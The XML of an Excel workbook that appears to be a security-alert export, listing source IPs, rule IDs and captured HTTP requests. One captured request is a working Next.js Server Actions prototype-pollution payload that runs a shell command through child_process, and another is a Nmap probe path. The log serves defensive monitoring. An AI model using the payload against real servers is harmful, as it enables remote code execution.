\"vehicleType\":13,\"vehicleModel\":\"\",\"useCharacter\":1,\"vin\":\"LGAG4DY3XH8009131\",\"engineNum\":\"78504253\",\"registerDate\":\"2017-03-24T16:00:00.000+00:00\",\"issueDate\":\"2020-08-06T16:00:00.000+00:00\",\"fileNum\":\"\",\"approvedCount\":2,\"permittedWeight\":0,\"permittedTowWeight\":38670,\"totalMass\":25000,\"maintenanceMass\":10200,\"outsideDimensions\":\"6940x2500x3960mm\",\"testRecord\":\"\",\"wheelCount\":0,\"axleCount\":3,\"axleDistance\":0,\"axisType\":\"\",\"vehicleFeatureVersion\":\"\",\"vehicleFeatureCode\":\"\",\"payAccountId\":\"\",\"createBy\":1,\"createTime\":\"2019-12-31T15:59:59.000+00:00\",\"updateBy\":177987654489477120,\"updateTime\":\"2020-08-07T01:28:28.000+00:00\"}}}</t>
  </si>
  <si>
    <t>多哥</t>
  </si>
  <si>
    <t>67cdb1c781de4efabc25388441e1dcb1</t>
  </si>
  <si>
    <t>1767653461</t>
  </si>
  <si>
    <t>154.70.82.114</t>
  </si>
  <si>
    <t>POST / HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\r\nContent-Length: 666\r\nAccept: text/x-component\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: ja-JP,ja;q=0.9,en;q=0.8\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=----FormBoundary79e2f50d0bac95f4\r\nDnt: 1\r\nNext-Action: x\r\nUpgrade-Insecure-Requests: 1\r\n\r\n</t>
  </si>
  <si>
    <t>------FormBoundary79e2f50d0bac95f4\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------FormBoundary79e2f50d0bac95f4\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------FormBoundary79e2f50d0bac95f4\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n------FormBoundary79e2f50d0bac95f4--</t>
  </si>
  <si>
    <t>https://192.168.30.34/nice%20ports%2C/Tri%6Eity.txt%2ebak</t>
  </si>
  <si>
    <t>8cea13a80c2f417fbfb52a9b92f9c060</t>
  </si>
  <si>
    <t>1767630960</t>
  </si>
  <si>
    <t>172.232.232.169</t>
  </si>
  <si>
    <t>/nice%20ports%2C/Tri%6Eity.txt%2ebak</t>
  </si>
  <si>
    <t>m_rule/2838023a778dfaecdc212708f721b788</t>
  </si>
  <si>
    <t>GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n\r\n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</si>
</sst>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2"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="H1" workbookViewId="0">
      <selection activeCell="L2" sqref="L2:L12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14"/>
  <cols>
    <col min="1" max="1" width="7.54545454545455" customWidth="1"/>
    <col min="2" max="2" width="12.9090909090909" customWidth="1"/>
    <col min="3" max="3" width="11.8181818181818" customWidth="1"/>
    <col min="4" max="4" width="16.2727272727273" customWidth="1"/>
    <col min="5" max="5" width="7.54545454545455" customWidth="1"/>
    <col min="6" max="6" width="9.54545454545454" customWidth="1"/>
    <col min="7" max="7" width="8.54545454545454" customWidth="1"/>
    <col min="8" max="8" width="91.6363636363636" customWidth="1"/>
    <col min="9" max="9" width="36.5454545454545" customWidth="1"/>
    <col min="10" max="10" width="11.8181818181818" customWidth="1"/>
    <col min="11" max="11" width="9.54545454545454" customWidth="1"/>
    <col min="12" max="12" width="17.3636363636364" customWidth="1"/>
    <col min="13" max="13" width="10.6363636363636" customWidth="1"/>
    <col min="14" max="14" width="17.3636363636364" customWidth="1"/>
    <col min="15" max="15" width="65.8181818181818" customWidth="1"/>
    <col min="16" max="16" width="44.3636363636364" customWidth="1"/>
    <col min="17" max="18" width="18.5454545454545" customWidth="1"/>
    <col min="19" max="19" width="9.54545454545454" customWidth="1"/>
    <col min="20" max="20" width="15.1818181818182" customWidth="1"/>
    <col min="21" max="24" width="255.636363636364" customWidth="1"/>
    <col min="25" max="25" width="217.636363636364" customWidth="1"/>
    <col min="26" max="26" width="9.54545454545454" customWidth="1"/>
    <col min="27" max="27" width="12.9090909090909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405005</v>
      </c>
      <c r="B2" t="s">
        <v>27</v>
      </c>
      <c r="C2" t="s">
        <v>28</v>
      </c>
      <c r="D2">
        <v>3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31</v>
      </c>
      <c r="L2" t="s">
        <v>35</v>
      </c>
      <c r="M2">
        <v>443</v>
      </c>
      <c r="N2" t="s">
        <v>36</v>
      </c>
      <c r="O2" t="s">
        <v>37</v>
      </c>
      <c r="P2" t="s">
        <v>38</v>
      </c>
      <c r="Q2" t="s">
        <v>39</v>
      </c>
      <c r="R2" t="s">
        <v>39</v>
      </c>
      <c r="S2">
        <v>49556</v>
      </c>
      <c r="T2" t="s">
        <v>40</v>
      </c>
      <c r="U2" t="s">
        <v>41</v>
      </c>
      <c r="V2" t="s">
        <v>31</v>
      </c>
      <c r="W2" t="s">
        <v>31</v>
      </c>
      <c r="X2" t="s">
        <v>31</v>
      </c>
      <c r="Y2" t="s">
        <v>42</v>
      </c>
      <c r="Z2" t="s">
        <v>43</v>
      </c>
      <c r="AA2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="3" spans="1:27">
      <c r="A3">
        <v>405004</v>
      </c>
      <c r="B3" t="s">
        <v>44</v>
      </c>
      <c r="C3" t="s">
        <v>28</v>
      </c>
      <c r="D3">
        <v>3</v>
      </c>
      <c r="E3" t="s">
        <v>29</v>
      </c>
      <c r="F3" t="s">
        <v>30</v>
      </c>
      <c r="G3" t="s">
        <v>31</v>
      </c>
      <c r="H3" t="s">
        <v>45</v>
      </c>
      <c r="I3" t="s">
        <v>46</v>
      </c>
      <c r="J3" t="s">
        <v>47</v>
      </c>
      <c r="K3" t="s">
        <v>31</v>
      </c>
      <c r="L3" t="s">
        <v>48</v>
      </c>
      <c r="M3">
        <v>443</v>
      </c>
      <c r="N3" t="s">
        <v>49</v>
      </c>
      <c r="O3" t="s">
        <v>50</v>
      </c>
      <c r="P3" t="s">
        <v>51</v>
      </c>
      <c r="Q3" t="s">
        <v>39</v>
      </c>
      <c r="R3" t="s">
        <v>39</v>
      </c>
      <c r="S3">
        <v>49364</v>
      </c>
      <c r="T3" t="s">
        <v>40</v>
      </c>
      <c r="U3" t="s">
        <v>52</v>
      </c>
      <c r="V3" t="s">
        <v>31</v>
      </c>
      <c r="W3" t="s">
        <v>31</v>
      </c>
      <c r="X3" t="s">
        <v>31</v>
      </c>
      <c r="Y3" t="s">
        <v>31</v>
      </c>
      <c r="Z3" t="s">
        <v>43</v>
      </c>
      <c r="AA3" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="4" spans="1:27">
      <c r="A4">
        <v>404998</v>
      </c>
      <c r="B4" t="s">
        <v>53</v>
      </c>
      <c r="C4" t="s">
        <v>28</v>
      </c>
      <c r="D4">
        <v>3</v>
      </c>
      <c r="E4" t="s">
        <v>29</v>
      </c>
      <c r="F4" t="s">
        <v>30</v>
      </c>
      <c r="G4" t="s">
        <v>54</v>
      </c>
      <c r="H4" t="s">
        <v>55</v>
      </c>
      <c r="I4" t="s">
        <v>56</v>
      </c>
      <c r="J4" t="s">
        <v>57</v>
      </c>
      <c r="K4"/>
      <c r="L4" t="s">
        <v>58</v>
      </c>
      <c r="M4">
        <v>443</v>
      </c>
      <c r="N4" t="s">
        <v>36</v>
      </c>
      <c r="O4" t="s">
        <v>59</v>
      </c>
      <c r="P4" t="s">
        <v>60</v>
      </c>
      <c r="Q4" t="s">
        <v>39</v>
      </c>
      <c r="R4" t="s">
        <v>39</v>
      </c>
      <c r="S4">
        <v>34658</v>
      </c>
      <c r="T4" t="s">
        <v>40</v>
      </c>
      <c r="U4" t="s">
        <v>61</v>
      </c>
      <c r="V4" t="s">
        <v>62</v>
      </c>
      <c r="W4"/>
      <c r="X4"/>
      <c r="Y4" t="s">
        <v>63</v>
      </c>
      <c r="Z4" t="s">
        <v>64</v>
      </c>
      <c r="AA4" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="5" spans="1:27">
      <c r="A5">
        <v>404989</v>
      </c>
      <c r="B5" t="s">
        <v>44</v>
      </c>
      <c r="C5" t="s">
        <v>66</v>
      </c>
      <c r="D5">
        <v>2</v>
      </c>
      <c r="E5" t="s">
        <v>67</v>
      </c>
      <c r="F5" t="s">
        <v>30</v>
      </c>
      <c r="G5"/>
      <c r="H5" t="s">
        <v>68</v>
      </c>
      <c r="I5" t="s">
        <v>69</v>
      </c>
      <c r="J5" t="s">
        <v>70</v>
      </c>
      <c r="K5"/>
      <c r="L5" t="s">
        <v>71</v>
      </c>
      <c r="M5">
        <v>443</v>
      </c>
      <c r="N5" t="s">
        <v>36</v>
      </c>
      <c r="O5" t="s">
        <v>72</v>
      </c>
      <c r="P5" t="s">
        <v>73</v>
      </c>
      <c r="Q5" t="s">
        <v>39</v>
      </c>
      <c r="R5" t="s">
        <v>39</v>
      </c>
      <c r="S5">
        <v>47882</v>
      </c>
      <c r="T5" t="s">
        <v>40</v>
      </c>
      <c r="U5" t="s">
        <v>74</v>
      </c>
      <c r="V5"/>
      <c r="W5" t="s">
        <v>75</v>
      </c>
      <c r="X5" t="s">
        <v>76</v>
      </c>
      <c r="Y5"/>
      <c r="Z5" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="6" spans="1:27">
      <c r="A6">
        <v>404988</v>
      </c>
      <c r="B6" t="s">
        <v>53</v>
      </c>
      <c r="C6" t="s">
        <v>28</v>
      </c>
      <c r="D6">
        <v>3</v>
      </c>
      <c r="E6" t="s">
        <v>29</v>
      </c>
      <c r="F6" t="s">
        <v>30</v>
      </c>
      <c r="G6"/>
      <c r="H6" t="s">
        <v>77</v>
      </c>
      <c r="I6" t="s">
        <v>78</v>
      </c>
      <c r="J6" t="s">
        <v>79</v>
      </c>
      <c r="K6"/>
      <c r="L6" t="s">
        <v>80</v>
      </c>
      <c r="M6">
        <v>443</v>
      </c>
      <c r="N6" t="s">
        <v>49</v>
      </c>
      <c r="O6" t="s">
        <v>59</v>
      </c>
      <c r="P6" t="s">
        <v>60</v>
      </c>
      <c r="Q6" t="s">
        <v>39</v>
      </c>
      <c r="R6" t="s">
        <v>39</v>
      </c>
      <c r="S6">
        <v>48102</v>
      </c>
      <c r="T6" t="s">
        <v>40</v>
      </c>
      <c r="U6" t="s">
        <v>81</v>
      </c>
      <c r="V6" t="s">
        <v>82</v>
      </c>
      <c r="W6"/>
      <c r="X6"/>
      <c r="Y6" t="s">
        <v>63</v>
      </c>
      <c r="Z6" t="s">
        <v>64</v>
      </c>
      <c r="AA6" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="7" spans="1:27">
      <c r="A7">
        <v>404983</v>
      </c>
      <c r="B7" t="s">
        <v>44</v>
      </c>
      <c r="C7" t="s">
        <v>28</v>
      </c>
      <c r="D7">
        <v>3</v>
      </c>
      <c r="E7" t="s">
        <v>29</v>
      </c>
      <c r="F7" t="s">
        <v>30</v>
      </c>
      <c r="G7" t="s">
        <v>83</v>
      </c>
      <c r="H7" t="s">
        <v>45</v>
      </c>
      <c r="I7" t="s">
        <v>84</v>
      </c>
      <c r="J7" t="s">
        <v>85</v>
      </c>
      <c r="K7"/>
      <c r="L7" t="s">
        <v>86</v>
      </c>
      <c r="M7">
        <v>443</v>
      </c>
      <c r="N7" t="s">
        <v>49</v>
      </c>
      <c r="O7" t="s">
        <v>50</v>
      </c>
      <c r="P7" t="s">
        <v>51</v>
      </c>
      <c r="Q7" t="s">
        <v>39</v>
      </c>
      <c r="R7" t="s">
        <v>39</v>
      </c>
      <c r="S7">
        <v>44450</v>
      </c>
      <c r="T7" t="s">
        <v>40</v>
      </c>
      <c r="U7" t="s">
        <v>87</v>
      </c>
      <c r="V7"/>
      <c r="W7"/>
      <c r="X7"/>
      <c r="Y7"/>
      <c r="Z7" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="8" spans="1:27">
      <c r="A8">
        <v>404982</v>
      </c>
      <c r="B8" t="s">
        <v>53</v>
      </c>
      <c r="C8" t="s">
        <v>28</v>
      </c>
      <c r="D8">
        <v>3</v>
      </c>
      <c r="E8" t="s">
        <v>29</v>
      </c>
      <c r="F8" t="s">
        <v>30</v>
      </c>
      <c r="G8" t="s">
        <v>83</v>
      </c>
      <c r="H8" t="s">
        <v>77</v>
      </c>
      <c r="I8" t="s">
        <v>88</v>
      </c>
      <c r="J8" t="s">
        <v>89</v>
      </c>
      <c r="K8"/>
      <c r="L8" t="s">
        <v>90</v>
      </c>
      <c r="M8">
        <v>443</v>
      </c>
      <c r="N8" t="s">
        <v>49</v>
      </c>
      <c r="O8" t="s">
        <v>59</v>
      </c>
      <c r="P8" t="s">
        <v>60</v>
      </c>
      <c r="Q8" t="s">
        <v>39</v>
      </c>
      <c r="R8" t="s">
        <v>39</v>
      </c>
      <c r="S8">
        <v>44534</v>
      </c>
      <c r="T8" t="s">
        <v>40</v>
      </c>
      <c r="U8" t="s">
        <v>91</v>
      </c>
      <c r="V8" t="s">
        <v>92</v>
      </c>
      <c r="W8"/>
      <c r="X8"/>
      <c r="Y8" t="s">
        <v>63</v>
      </c>
      <c r="Z8" t="s">
        <v>64</v>
      </c>
      <c r="AA8" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="9" spans="1:27">
      <c r="A9">
        <v>404981</v>
      </c>
      <c r="B9" t="s">
        <v>53</v>
      </c>
      <c r="C9" t="s">
        <v>28</v>
      </c>
      <c r="D9">
        <v>3</v>
      </c>
      <c r="E9" t="s">
        <v>29</v>
      </c>
      <c r="F9" t="s">
        <v>30</v>
      </c>
      <c r="G9" t="s">
        <v>93</v>
      </c>
      <c r="H9" t="s">
        <v>77</v>
      </c>
      <c r="I9" t="s">
        <v>94</v>
      </c>
      <c r="J9" t="s">
        <v>95</v>
      </c>
      <c r="K9"/>
      <c r="L9" t="s">
        <v>96</v>
      </c>
      <c r="M9">
        <v>443</v>
      </c>
      <c r="N9" t="s">
        <v>49</v>
      </c>
      <c r="O9" t="s">
        <v>59</v>
      </c>
      <c r="P9" t="s">
        <v>60</v>
      </c>
      <c r="Q9" t="s">
        <v>39</v>
      </c>
      <c r="R9" t="s">
        <v>39</v>
      </c>
      <c r="S9">
        <v>44590</v>
      </c>
      <c r="T9" t="s">
        <v>40</v>
      </c>
      <c r="U9" t="s">
        <v>97</v>
      </c>
      <c r="V9" t="s">
        <v>98</v>
      </c>
      <c r="W9"/>
      <c r="X9"/>
      <c r="Y9" t="s">
        <v>63</v>
      </c>
      <c r="Z9" t="s">
        <v>64</v>
      </c>
      <c r="AA9" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="10" spans="1:27">
      <c r="A10">
        <v>404973</v>
      </c>
      <c r="B10" t="s">
        <v>44</v>
      </c>
      <c r="C10" t="s">
        <v>66</v>
      </c>
      <c r="D10">
        <v>2</v>
      </c>
      <c r="E10" t="s">
        <v>67</v>
      </c>
      <c r="F10" t="s">
        <v>30</v>
      </c>
      <c r="G10" t="s">
        <v>99</v>
      </c>
      <c r="H10" t="s">
        <v>100</v>
      </c>
      <c r="I10" t="s">
        <v>101</v>
      </c>
      <c r="J10" t="s">
        <v>102</v>
      </c>
      <c r="K10" t="s">
        <v>103</v>
      </c>
      <c r="L10" t="s">
        <v>104</v>
      </c>
      <c r="M10">
        <v>443</v>
      </c>
      <c r="N10" t="s">
        <v>105</v>
      </c>
      <c r="O10" t="s">
        <v>106</v>
      </c>
      <c r="P10" t="s">
        <v>107</v>
      </c>
      <c r="Q10" t="s">
        <v>39</v>
      </c>
      <c r="R10" t="s">
        <v>39</v>
      </c>
      <c r="S10">
        <v>54703</v>
      </c>
      <c r="T10" t="s">
        <v>40</v>
      </c>
      <c r="U10" t="s">
        <v>108</v>
      </c>
      <c r="V10"/>
      <c r="W10" t="s">
        <v>109</v>
      </c>
      <c r="X10" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="11" spans="1:27">
      <c r="A11">
        <v>404972</v>
      </c>
      <c r="B11" t="s">
        <v>53</v>
      </c>
      <c r="C11" t="s">
        <v>28</v>
      </c>
      <c r="D11">
        <v>3</v>
      </c>
      <c r="E11" t="s">
        <v>29</v>
      </c>
      <c r="F11" t="s">
        <v>30</v>
      </c>
      <c r="G11" t="s">
        <v>111</v>
      </c>
      <c r="H11" t="s">
        <v>77</v>
      </c>
      <c r="I11" t="s">
        <v>112</v>
      </c>
      <c r="J11" t="s">
        <v>113</v>
      </c>
      <c r="K11"/>
      <c r="L11" t="s">
        <v>114</v>
      </c>
      <c r="M11">
        <v>443</v>
      </c>
      <c r="N11" t="s">
        <v>49</v>
      </c>
      <c r="O11" t="s">
        <v>59</v>
      </c>
      <c r="P11" t="s">
        <v>60</v>
      </c>
      <c r="Q11" t="s">
        <v>39</v>
      </c>
      <c r="R11" t="s">
        <v>39</v>
      </c>
      <c r="S11">
        <v>41994</v>
      </c>
      <c r="T11" t="s">
        <v>40</v>
      </c>
      <c r="U11" t="s">
        <v>115</v>
      </c>
      <c r="V11" t="s">
        <v>116</v>
      </c>
      <c r="W11"/>
      <c r="X11"/>
      <c r="Y11" t="s">
        <v>63</v>
      </c>
      <c r="Z11" t="s">
        <v>64</v>
      </c>
      <c r="AA11" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="12" spans="1:27">
      <c r="A12">
        <v>404971</v>
      </c>
      <c r="B12" t="s">
        <v>44</v>
      </c>
      <c r="C12" t="s">
        <v>66</v>
      </c>
      <c r="D12">
        <v>2</v>
      </c>
      <c r="E12" t="s">
        <v>67</v>
      </c>
      <c r="F12" t="s">
        <v>30</v>
      </c>
      <c r="G12" t="s">
        <v>83</v>
      </c>
      <c r="H12" t="s">
        <v>117</v>
      </c>
      <c r="I12" t="s">
        <v>118</v>
      </c>
      <c r="J12" t="s">
        <v>119</v>
      </c>
      <c r="K12"/>
      <c r="L12" t="s">
        <v>120</v>
      </c>
      <c r="M12">
        <v>443</v>
      </c>
      <c r="N12" t="s">
        <v>40</v>
      </c>
      <c r="O12" t="s">
        <v>121</v>
      </c>
      <c r="P12" t="s">
        <v>122</v>
      </c>
      <c r="Q12" t="s">
        <v>39</v>
      </c>
      <c r="R12" t="s">
        <v>39</v>
      </c>
      <c r="S12">
        <v>56902</v>
      </c>
      <c r="T12" t="s">
        <v>40</v>
      </c>
      <c r="U12" t="s">
        <v>123</v>
      </c>
      <c r="V12"/>
      <c r="W12"/>
      <c r="X12"/>
      <c r="Y12"/>
      <c r="Z12" t="s">
        <v>43</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="L1:L12 L14:L104857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张峰</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-07T00:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-07T01:19:58Z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A212D36A9F694BB8B687F396487790B4_12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